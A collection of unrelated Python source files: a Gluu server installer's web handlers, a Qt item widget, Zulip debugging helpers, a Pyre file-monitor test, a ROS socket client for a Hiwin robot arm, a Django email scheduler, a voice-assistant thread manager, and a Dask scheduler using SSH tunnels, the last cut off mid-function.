bt_.append('wrends[R]')
if self.install_object.cb_install == LOCAL:
bt_.append('couchbase')
elif self.install_object.cb_install == REMOTE:
bt_.append('couchbase[R]')
value = ', '.join(bt_)
elif field == 'wrends_storages':
if self.install_object.wrends_install is not NONE \
and self.install_object.cb_install is not NONE:
wds_ = []
for k in self.install_object.mappingLocations:
if self.install_object.mappingLocations[k] == 'ldap':
wds_.append(k)
value = ', '.join(wds_)
else:
value = getattr(self.install_object, field)
packages[label] = value
data['packages'] = packages
return template('display_summary', data)
def install_handler(self):
data = {
'title': msg.InstallStepsForm_label,
'installing': msg.installing_label,
'description': "",
'progress_max_value': msg.installation_step_number + 1
}
t = threading.Thread(target=self.install_object.do_installation, args=(self.queue,))
t.daemon = True
t.start()
return template('installation', data)
def installation(self):
data = {}
if not self.queue.empty():
qdata = self.queue.get()
if qdata[0] == COMPLETED:
if self.install_object.post_messages:
data['message'] = '\n'.join(self.install_object.post_messages)
data['progress_percentage'] = qdata[0]
data['message'] = msg.installation_completed.format(self.install_object.hostname)
data['installing'] = qdata[2]
response.content_type = 'application/json'
return json.dumps(data)
elif qdata[0] == ERROR:
data['progress_percentage'] = qdata[0]
data['installing'] = qdata[2]
data['message'] = msg.installation_error + "\n" + qdata[2]
response.content_type = 'application/json'
return json.dumps(data)
data['progress_percentage'] = qdata[0]
data['installing'] = qdata[2]
if not data.get('description') or data['description'] != qdata[1]:
if hasattr(msg, 'installation_description_' + qdata[1]):
desc = getattr(msg, 'installation_description_' + qdata[1])
else:
desc = msg.installation_description_gluu
data['description'] = '\n'.join(textwrap.wrap(text=desc))
response.content_type = 'application/json'
return json.dumps(data)
def post_install_handler(self):
data = {
'title': 'Post Installation'
}
services = {
'installSaml': '/opt/shibboleth-idp',
'installPassport': '/opt/gluu/node/passport',
'installOxd': '/opt/oxd-server',
'installCasa': '/opt/gluu/jetty/casa',
'installGluuRadius': '/opt/gluu/radius/super-gluu-radius-server.jar'
}
components = []
for service, path in services.items():
components.append({
'service': service,
'installed': True if os.path.exists(path) else False,
'label': getattr(msg, 'ask_' + service)
})
data.update({'components': components})
return template('post_installation', data)
def add_services_handler(self):
service_to_install = []
if not request.json.items():
return dict({'status': False, "message": "No component's to install"})
for k, v in request.json.items():
service_to_install.append(k)
t = threading.Thread(target=self.add_service_task, args=(self.queue, service_to_install))
t.daemon = True
t.start()
return dict({'status': True, 'service_to_install': service_to_install})
def add_service_task(self, q, service_to_install):
args_for_installer = {
'installSaml': ('addshib', 'SAML Shibboleth IDP'),
'installPassport': ('addpassport', 'Passport'),
'installOxd': ('addoxd', 'Oxd Server'),
'installCasa': ('addcasa', 'Gluu Casa'),
'installGluuRadius': ('addradius', 'Gluu Radius Server'),
}
for service in service_to_install:
cmd = ["python3", "post-setup-add-components.py", "-{}".format(args_for_installer[service][0])]
try:
q.put((service, ' Installing {}'.format(service)))
self.process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
while self.process.poll() is None:
output = self.process.stdout.readline()
if output == '' and self.process.poll() is not None:
break
if output:
q.put((service, output.strip().decode()))
except subprocess.CalledProcessError:
q.put((ERROR, 'something went wrong'))
q.put((COMPLETED, 'done'))
def get_log(self):
data = {}
if not self.queue.empty():
qdata = self.queue.get()
data['progress_percentage'] = 10
data['message'] = qdata[1]
data['service'] = qdata[0]
if qdata[0] == COMPLETED:
data['progress_percentage'] = COMPLETED
data['message'] = 'Installation Completed'
elif qdata[0] == ERROR:
data['progress_percentage'] = ERROR
data['message'] = 'Opps something went wrong'
response.content_type = 'application/json'
return json.dumps(data)
def shutdown(self):
self._app.stop()
|
_ItemWidget.py | import threading
import R
from Utils.WebUtil import setLabelImg
from ui.ui_designer.ui_file.uic_itemWidget import Ui_item
class _ItemWidget(Ui_item):
def __init__(self, params):
"""
:param params: {'url', 'title', 'latest' , 'area', 'time' , 'stars'}
"""
self.params = params
pass
def init(self):
print('params', self.params)
# 设置标题
# print(self.params['title'])
self.lblTitle.setText(self.params['title'])
# 设置标题提示
self.lblTitle.setToolTip(self.params['title'])
# 设置最近集数
if self.params['latest'].strip() == R.string.NONE:
pass
else:
self.lblLatest.setText('最新至:' + self.params['latest'])
pass
# 设置封面 在线程里面设置,防止主线程卡顿
t = threading.Thread(target=setLabelImg, name='', args=(self.lblCover, self.params['cover'],))
t.start()
print('添加 ' + self.params['title'] + '完成')
pass
pass
|
debug.py |
import code
import gc
import logging
import os
import signal
import socket
import threading
import traceback
import tracemalloc
from types import FrameType
from django.conf import settings
from django.utils.timezone import now as timezone_now
from typing import Optional
logger = logging.getLogger('zulip.debug')
# Interactive debugging code from
# http://stackoverflow.com/questions/132058/showing-the-stack-trace-from-a-running-python-application
# (that link also points to code for an interactive remote debugger
# setup, which we might want if we move Tornado to run in a daemon
# rather than via screen).
def interactive_debug(sig: int, frame: FrameType) -> None:
"""Interrupt running process, and provide a python prompt for
interactive debugging."""
d = {'_frame': frame} # Allow access to frame object.
d.update(frame.f_globals) # Unless shadowed by global
d.update(frame.f_locals)
message = "Signal received : entering python shell.\nTraceback:\n"
message += ''.join(traceback.format_stack(frame))
i = code.InteractiveConsole(d)
i.interact(message)
# SIGUSR1 => Just print the stack
# SIGUSR2 => Print stack + open interactive debugging shell
def interactive_debug_listen() -> None:
signal.signal(signal.SIGUSR1, lambda sig, stack: traceback.print_stack(stack))
signal.signal(signal.SIGUSR2, interactive_debug)
def tracemalloc_dump() -> None:
if not tracemalloc.is_tracing():
logger.warning("pid {}: tracemalloc off, nothing to dump"
.format(os.getpid()))
return
# Despite our name for it, `timezone_now` always deals in UTC.
basename = "snap.{}.{}".format(os.getpid(),
timezone_now().strftime("%F-%T"))
path = os.path.join(settings.TRACEMALLOC_DUMP_DIR, basename)
os.makedirs(settings.TRACEMALLOC_DUMP_DIR, exist_ok=True)
gc.collect()
tracemalloc.take_snapshot().dump(path)
with open('/proc/{}/stat'.format(os.getpid()), 'rb') as f:
procstat = f.read().split()
rss_pages = int(procstat[23])
logger.info("tracemalloc dump: tracing {} MiB ({} MiB peak), using {} MiB; rss {} MiB; dumped {}"
.format(tracemalloc.get_traced_memory()[0] // 1048576,
tracemalloc.get_traced_memory()[1] // 1048576,
tracemalloc.get_tracemalloc_memory() // 1048576,
rss_pages // 256,
basename))
def tracemalloc_listen_sock(sock: socket.socket) -> None:
logger.debug('pid {}: tracemalloc_listen_sock started!'.format(os.getpid()))
while True:
sock.recv(1)
tracemalloc_dump()
listener_pid = None # type: Optional[int]
def tracemalloc_listen() -> None:
global listener_pid
if listener_pid == os.getpid():
# Already set up -- and in this process, not just its parent.
return
logger.debug('pid {}: tracemalloc_listen working...'.format(os.getpid()))
listener_pid = os.getpid()
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
path = "/tmp/tracemalloc.{}".format(os.getpid())
sock.bind(path)
thread = threading.Thread(target=lambda: tracemalloc_listen_sock(sock),
daemon=True)
thread.start()
logger.debug('pid {}: tracemalloc_listen done: {}'.format(
os.getpid(), path))
def maybe_tracemalloc_listen() -> None:
'''If tracemalloc tracing enabled, listen for requests to dump a snapshot.
To trigger once this is listening:
echo | socat -u stdin unix-sendto:/tmp/tracemalloc.$pid
To enable in the Zulip web server: edit /etc/zulip/uwsgi.ini ,
and add e.g. ` PYTHONTRACEMALLOC=5` to the `env=` line.
This function is called in middleware, so the process will
automatically start listening.
To enable in other contexts: see upstream docs
https://docs.python.org/3/library/tracemalloc .
You may also have to add a call to this function somewhere.
'''
if os.environ.get('PYTHONTRACEMALLOC'):
# If the server was started with `tracemalloc` tracing on, then
# listen for a signal to dump `tracemalloc` snapshots.
tracemalloc_listen()
|
project_files_monitor_test.py | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-unsafe
import os
import socket
import tempfile
import threading
import unittest
from unittest.mock import MagicMock, patch
from .. import json_rpc, project_files_monitor
from ..analysis_directory import UpdatedPaths
from ..json_rpc import Request, read_lsp_request
from ..project_files_monitor import MonitorException, ProjectFilesMonitor
from ..socket_connection import SocketConnection, SocketException
from ..tests.mocks import mock_configuration
class MonitorTest(unittest.TestCase):
@patch.object(SocketConnection, "connect")
@patch.object(json_rpc, "perform_handshake")
# pyre-fixme[56]: Argument `tools.pyre.client.project_files_monitor` to
# decorator factory `unittest.mock.patch.object` could not be resolved in a global
# scope.
@patch.object(project_files_monitor, "find_parent_directory_containing_file")
def test_subscriptions(
self,
find_parent_directory_containing_file,
perform_handshake,
_socket_connection,
) -> None:
find_parent_directory_containing_file.return_value = "/ROOT"
configuration = mock_configuration()
analysis_directory = MagicMock()
analysis_directory.get_root.return_value = "/ROOT"
# no additional extensions
configuration.extensions = []
monitor = ProjectFilesMonitor(configuration, ".", analysis_directory)
self.assertEqual(len(monitor._subscriptions), 1)
subscription = monitor._subscriptions[0]
self.assertEqual(subscription.root, "/ROOT")
self.assertEqual(subscription.name, "pyre_file_change_subscription")
self.assertEqual(subscription.subscription["fields"], ["name"])
self.assertEqual(
subscription.subscription["expression"][0:2], ["allof", ["type", "f"]]
)
self.assertCountEqual(
subscription.subscription["expression"][2],
[
"anyof",
["suffix", "py"],
["suffix", "pyi"],
["suffix", "thrift"],
["match", "TARGETS"],
],
)
# additional extensions
configuration.get_valid_extension_suffixes = lambda: [".thrift", ".whl"]
monitor = ProjectFilesMonitor(configuration, ".", analysis_directory)
self.assertEqual(len(monitor._subscriptions), 1)
subscription = monitor._subscriptions[0]
self.assertEqual(subscription.root, "/ROOT")
self.assertEqual(subscription.name, "pyre_file_change_subscription")
self.assertEqual(subscription.subscription["fields"], ["name"])
self.assertEqual(
subscription.subscription["expression"][0:2], ["allof", ["type", "f"]]
)
self.assertCountEqual(
subscription.subscription["expression"][2],
[
"anyof",
["suffix", "py"],
["suffix", "pyi"],
["suffix", "thrift"],
["suffix", "whl"],
["match", "TARGETS"],
],
)
# no watchman root -> terminate
find_parent_directory_containing_file.return_value = None
self.assertRaises(
MonitorException,
ProjectFilesMonitor,
configuration,
".",
analysis_directory,
)
def test_bad_socket(self) -> None:
with tempfile.TemporaryDirectory() as root:
bad_socket_path = os.path.join(root, "bad.sock")
socket_connection = SocketConnection(bad_socket_path)
self.assertRaises(SocketException, socket_connection.connect)
@patch.object(ProjectFilesMonitor, "_find_watchman_path")
def test_socket_communication(self, _find_watchman_path) -> None:
# Create a "server" thread to complete the handshake
server_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
errors = []
with tempfile.TemporaryDirectory() as root:
socket_path = os.path.join(root, ".pyre", "server", "json_server.sock")
os.makedirs(os.path.dirname(socket_path))
socket_created_lock = threading.Lock()
socket_created_lock.acquire() # hold lock until server creates socket
def server():
server_socket.bind(socket_path)
server_socket.listen(1)
socket_created_lock.release()
connection, _ = server_socket.accept()
outfile = connection.makefile(mode="wb")
infile = connection.makefile(mode="rb")
request = Request(
method="handshake/server",
parameters=json_rpc.ByNameParameters({"version": "123"}),
)
json_rpc.write_lsp_request(outfile, request)
response = read_lsp_request(infile)
if response.method != "handshake/client":
errors.append("Client handshake malformed")
return
request = Request(method="handshake/socket_added")
json_rpc.write_lsp_request(outfile, request)
updated_message = read_lsp_request(infile)
if (
updated_message.method != "updateFiles"
or not updated_message.parameters
or updated_message.parameters.get("files")
!= ["/ANALYSIS/a.py", "/ANALYSIS/subdir/b.py"]
):
errors.append("Update message malformed")
server_thread = threading.Thread(target=server)
server_thread.start()
configuration = mock_configuration(version_hash="123")
configuration.log_directory = root + "/.pyre"
configuration.extensions = []
analysis_directory = MagicMock()
analysis_directory.process_updated_files.side_effect = (
lambda files: UpdatedPaths(
updated_paths=[file.replace("ROOT", "ANALYSIS") for file in files],
deleted_paths=[],
)
)
# only create the monitor once the socket is open
with socket_created_lock:
monitor = ProjectFilesMonitor(configuration, ".", analysis_directory)
monitor._handle_response(
{"root": "/ROOT", "files": ["a.py", "subdir/b.py"]}
)
analysis_directory.process_updated_files.assert_called_once_with(
["/ROOT/a.py", "/ROOT/subdir/b.py"]
)
server_thread.join()
self.assertEqual(errors, [])
@patch.object(SocketConnection, "connect")
# pyre-fixme[56]: Argument `tools.pyre.client.json_rpc` to decorator factory
# `unittest.mock.patch.object` could not be resolved in a global scope.
@patch.object(json_rpc, "perform_handshake")
@patch.object(ProjectFilesMonitor, "_watchman_client")
@patch.object(ProjectFilesMonitor, "_find_watchman_path")
def test_files_cleaned_up(
self,
_find_watchman_path,
_watchman_client,
perform_handshake,
_socket_connection,
) -> None:
with tempfile.TemporaryDirectory() as root:
configuration = mock_configuration()
configuration.extensions = []
configuration.log_directory = root + ".pyre"
analysis_directory = MagicMock()
analysis_directory.get_root.return_value = root
monitor = ProjectFilesMonitor(configuration, ".", analysis_directory)
monitor._alive = False # never enter watchman loop
monitor._run()
monitor_folder = os.path.join(".pyre", "file_monitor")
self.assertFalse(
os.path.exists(os.path.join(monitor_folder, "file_monitor.lock"))
)
self.assertFalse(
os.path.exists(os.path.join(monitor_folder, "file_monitor.pid"))
)
# pyre-fixme[56]: Argument `os.path` to decorator factory
# `unittest.mock.patch.object` could not be resolved in a global scope.
@patch.object(os.path, "realpath")
def test_socket_connection(self, realpath) -> None:
server_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
with tempfile.TemporaryDirectory() as root:
realpath.side_effect = lambda path: path.replace(
os.path.dirname(path), root # replace parent directories with tempdir
)
# Unix sockets have a limited length of ~100 characters, so the server uses
# symbolic links as a workaround. We need to properly translate these.
socket_link = os.path.join(
".pyre", "long_name" * 15, "server", "json_server.sock"
)
socket_path = os.path.join(root, "json_server.sock")
socket_created_lock = threading.Lock()
socket_created_lock.acquire() # hold lock until server creates socket
def server():
server_socket.bind(socket_path)
server_socket.listen(1)
socket_created_lock.release()
connection, _ = server_socket.accept()
server_thread = threading.Thread(target=server)
server_thread.start()
with socket_created_lock:
SocketConnection(socket_link).connect()
server_thread.join()
|
Hiwin_RT605_Socket_v3_20190628101422.py | #!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd_v3 as TCP
import HiwinRA605_socket_Taskcmd_v3 as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
#Socket = 0
#data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
class client():
def __init__(self):
#self.get_connect()
pass
def get_connect(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect(('192.168.0.1', 8080))
def send(self, msg):
self.s.send(msg.encode('utf-8')) #用utf-8來encode,還有其他encode的方法,str用utf-8就OK!
def get_recieve(self):
data = self.s.recv(1024) #1024指定buffer的大小,限制一次收多少
data.decode('utf-8')
return data
def close(self):
self.s.close()
Socket = client()
def point_data(x,y,z,pitch,roll,yaw): ##接收策略端傳送位姿資料
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ##接收策略端傳送手臂模式資料
socket_cmd.Speedmode = speedmode
# def point_data(req): ##接收策略端傳送位姿資料
# pos.x = '%s'%req.x
# pos.y = '%s'%req.y
# pos.z = '%s'%req.z
# pos.pitch = '%s'%req.pitch
# pos.roll = '%s'%req.roll
# pos.yaw = '%s'%req.yaw
# return(1)
# ##----------Arm Mode-------------###
# def Arm_Mode(req): ##接收策略端傳送手臂模式資料
# global arm_mode_flag
# socket_cmd.action = int('%s'%req.action)
# socket_cmd.grip = int('%s'%req.grip)
# socket_cmd.ra = int('%s'%req.ra)
# socket_cmd.setvel = int('%s'%req.vel)
# socket_cmd.setboth = int('%s'%req.both)
# arm_mode_flag = True
# Socket_command()
# return(1)
# ##-------Arm Speed Mode------------###
# def Speed_Mode(req): ##接收策略端傳送手臂模式資料
# global speed_mode_flag
# socket_cmd.Speedmode = int('%s'%req.Speedmode)
# return(1)
def socket_talker(): ##創建Server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
rate = rospy.Rate(100) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
pub.publish(state)
rate.sleep()
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command():
global Socket
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 6 ##切換初始mode狀態
print(data)
print("Socket:", Socket)
#Socket.send(data.encode('utf-8'))#socket傳送for python to translate str
Socket.send(data)
##-----------socket client--------
def socket_client():
global Socket
try:
#Socket = client()
Socket.get_connect()
#Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
print('Connection has been successful')
except socket.error as msg:
print(msg)
sys.exit(1)
#print('Connection has been successful')
Socket_feedback(Socket)
rospy.on_shutdown(myhook)
Socket.close()
def Socket_feedback(s):
Socket = s
while 1:
feedback_str = Socket.get_recieve()
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
state_feedback.ArmState = 0
if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
state_feedback.ArmState = 1
if str(feedback_str[2]) == '54':# 6 策略完成
state_feedback.ArmState = 6
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
state_feedback.SentFlag = 0
if str(feedback_str[4]) == '49':#回傳1 true
state_feedback.SentFlag = 1
##---------------socket 傳輸手臂命令 end-----------------
if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
break
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 6##切換初始mode狀態
## 多執行緒
t = threading.Thread(target=socket_client)
t.start() # 開啟多執行緒
#time.sleep(1)
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
## 多執行序 end
|
signals.py | from django.db.models.signals import post_save
from django.dispatch import receiver
from django.conf import settings
import threading
import sendgrid
import time
from sendgrid.helpers.mail import Mail
from .models import Email
def create_data(text, date):
data = {
"data": {
"sent_datetime": "UTC " + date.strftime("%c"),
"text": text
}
}
return data
def send_email(to_email, template_data):
sg = sendgrid.SendGridAPIClient(settings.SENDGRID_API_KEY)
message = Mail(
from_email=settings.SENDGRID_FROM,
to_emails=to_email,
)
message.template_id = settings.SENDGRID_TEMPLATE_ID
message.dynamic_template_data = template_data
response = sg.send(message)
return response
def schedule_email(em):
em.status = Email.STATUS_SHCEDULED
em.save()
time.sleep(em.delay)
em.status = Email.STATUS_SENT
try:
resp = send_email(em.to_email,
create_data(em.body_text, em.scheduled_for))
except Exception as e:
em.status = Email.STATUS_SENT_ERROR
em.save()
@receiver(post_save, sender=Email)
def email_added(sender, instance, created, **kwargs):
if created:
t = threading.Thread(target=schedule_email, args=(instance, ))
t.start() |
main.py | #!/usr/bin/env python
"""
Streams in always on microphone, transcribes (speech (audio) to text), runs results through function to find user defined wake words and commands.
Main components:
-this file, master file which creates shared queues, starts up threads, kills threads
-STT - GCP
-server - TCP socket
-voice command system that parses commands and runs the commands
Both of these are IO-bound, both of them need to run all the time. We need be asynchronous, for now that's with multithreading.
@author: Cayden Pierce, Emex Labs
"""
import sys
import time
from queue import Queue, Empty
from threading import Thread
from rx import of, operators as op
import random
from rx.subject import Subject
from utils.gcp_stt import run_google_stt
from utils.gcp_translate import run_google_translate
from utils.voice_command_server import run_voice_command_server, run_voice_command
from utils.ASGAudioServer import run_audio_server
from language_options import language_options
def make_new_thread(thread_q, thread_holder, translate_q, obj_q, audio_stream_observable): #handles making new threads and adding them to the thread holder for the main loop
try:
thread_obj = thread_q.get(False)
if thread_obj:
print("thread request")
thread_type = thread_obj["type"]
if thread_type == "translate":
if thread_obj["cmd"] == "start":
#first, check if translate mode is already running
try:
translate_stt_thread = thread_holder["translate_stt"]
translater_thread = thread_holder["translater"]
if translate_stt_thread is not None or translater_thread is not None:
return
except KeyError:
pass
language = thread_obj["language"]
source_language = language_options[language.lower()]
#source_language = "es"
translate_stt_thread = Thread(target = run_google_stt, args = (translate_q, audio_stream_observable, source_language)) #transcribes a different language
translater_thread = Thread(target = run_google_translate, args = (translate_q, obj_q, source_language)) #takes those translations and converts them into our target language
print("STARTING TRANSLATION THREAD")
translate_stt_thread.start()
translater_thread.start()
thread_holder["translate_stt"] = translate_stt_thread
thread_holder["translater"] = translater_thread
else: #if cmd is kill, then stop the translater, if it's running
try:
translate_stt_thread = thread_holder["translate_stt"]
translater_thread = thread_holder["translater"]
except KeyError:
return
if translate_stt_thread:
print("attempting to kill (((((((((((((((((((((((((((((((((((((((((")
translate_stt_thread.do_run = False
translate_stt_thread.join()
print("kill success (((((((((((((((((((((((((((((((((((((((((")
thread_holder["translate_stt"] = None
if translater_thread:
print("2attempting to kill (((((((((((((((((((((((((((((((((((((((((")
translater_thread.do_run = False
translater_thread.join()
print("2kill success (((((((((((((((((((((((((((((((((((((((((")
thread_holder["translater"] = None
except Empty:
pass
def main():
# Create the shared queue and launch both threads
transcript_q = Queue() #to share raw transcriptions
cmd_q = Queue() #to share parsed commands (currently voice command is running in run_google_stt)
obj_q = Queue() #generic object queue to pass anything, of type: {"type" : "transcript" : "data" : "hello world"} or similiar
thread_q = Queue() #requests to the main thread to start a new thread
translate_q = Queue() # holds text to be translated to english
test_q = Queue() # a test queue that no one will ever read
audio_stream_observable = Subject() #an observable to share the audio data stream with anyone who subscribes to the stream
print(dir(audio_stream_observable))
server_thread = Thread(target = run_voice_command_server, args = (transcript_q, cmd_q, obj_q))
audio_server_thread = Thread(target = run_audio_server, args = (audio_stream_observable,))
stt_thread = Thread(target = run_google_stt, args = (transcript_q, audio_stream_observable))
voice_command_thread = Thread(target = run_voice_command, args = (transcript_q, cmd_q, obj_q, thread_q))
#set the thread kill boolean to true
audio_server_thread.do_run = True
server_thread.start() #create connection with ASG and handle sending it stuff
audio_server_thread.start()
stt_thread.start() #convert speech to text, fill queue with transcribed speech
voice_command_thread.start() #receive output form STT, process it, send results and commands to ASG
#look for requests to start a new thread (some threads, like a translation service, are only started when requested by the user, and killed when the user requests to kill it
thread_holder = dict()
i = 0
while True:
make_new_thread(thread_q, thread_holder, translate_q, obj_q, audio_stream_observable)
i += 1
time.sleep(0.2)
#shutdown - kill thread
audio_server.do_run = False
stt_thread.do_run = False
server_thread.kill()
stt_thread.kill()
voice_command_thread.kill()
audio_server_thread.kill()
server_thread.join()
stt_thread.join()
voice_command_thread.join()
audio_server_thread.join()
if __name__ == "__main__":
main()
|
dask_remote_scheduler.py | import distributed
from tornado.ioloop import IOLoop
from threading import Thread
from distributed import Scheduler, Worker, Executor
import paramiko
import select
import getpass
import os
import socket
import select
import threading
from pipeline import msg
try:
import SocketServer
except ImportError:
import socketserver as SocketServer
g_verbose = True
def verbose(s):
if g_verbose:
msg.logMessage(s,msg.DEBUG)
class ForwardServer(SocketServer.ThreadingTCPServer):
daemon_threads = True
allow_reuse_address = True
class Handler(SocketServer.BaseRequestHandler):
def handle(self):
try:
chan = self.ssh_transport.open_channel('direct-tcpip',
(self.chain_host, self.chain_port),
self.request.getpeername())
except Exception as e:
verbose('Incoming request to %s:%d failed: %s' % (self.chain_host,
self.chain_port,
repr(e)))
return
if chan is None:
verbose('Incoming request to %s:%d was rejected by the SSH server.' %
(self.chain_host, self.chain_port))
return
verbose('Connected! Tunnel open %r -> %r -> %r' % (self.request.getpeername(),
chan.getpeername(), (self.chain_host, self.chain_port)))
while True:
r, w, x = select.select([self.request, chan], [], [])
if self.request in r:
data = self.request.recv(1024)
if len(data) == 0:
break
chan.send(data)
if chan in r:
data = chan.recv(1024)
if len(data) == 0:
break
self.request.send(data)
peername = self.request.getpeername()
chan.close()
self.request.close()
verbose('Tunnel closed from %r' % (peername,))
class DaskScheduler(object):
def __init__(self, client, ipaddr, port, password, runscript):
self.client = client
self.ipaddr = ipaddr
self.port = port
self.runscript = runscript
self.password = password
# self.command = "/usr/common/graphics/visit/camera/runscript.sh {0} {1}".format(ipaddr, port)
self.command = runscript + " {0} {1}".format(ipaddr, port)
msg.logMessage(self.command,msg.DEBUG)
def serve(self):
msg.logMessage("Serving: " + self.command,msg.INFO)
channel = self.client.get_transport().open_session()
msg.logMessage(channel.get_pty(),msg.DEBUG)
# channel.exec_command('tty')
channel.exec_command(self.command)
readytorun=False
while True:
if channel.exit_status_ready():
break
rl, wl, xl = select.select([channel], [], [], 10.0)
if len(rl) > 0:
line = channel.recv(1024)
msg.logMessage(line)
if 'queued and waiting for resources' in line:
msg.showMessage('Execution queued and waiting for resources...')
elif 'has been allocated resources' in line:
msg.showMessage('Execution has been allocated resources...')
readytorun=True
if readytorun and line:
msg.showMessage('Executing job...')
readytorun=False
if line.find("Password") >= 0:
msg.logMessage("writing password",msg.DEBUG)
channel.sendall(self.password + "\n")
msg.logMessage("Ending Dask Scheduler",msg.INFO)
class DaskWorker(object):
def __init__(self, client, ipaddr, port, nodes, partition, time, procs, threads):
self.client = client
self.ipaddr = ipaddr
self.port = port
self.nodes = nodes
self.partition = partition
self.time = time
self.procs = procs
self.threads = threads
self.command = "/usr/common/graphics/visit/camera/runlocalserver.sh {0} {1}".format(ipaddr, port)
# self.command = "/usr/common/graphics/visit/camera/runserver.sh {0} {1} {2} {3} {4} {5} {6}".format(ipaddr, port, nodes, partition, time, procs, threads)
msg.logMessage(self.command,msg.DEBUG)
def serve(self):
msg.logMessage("Serving Worker: " + self.command,msg.INFO)
channel = self.client.get_transport().open_session()
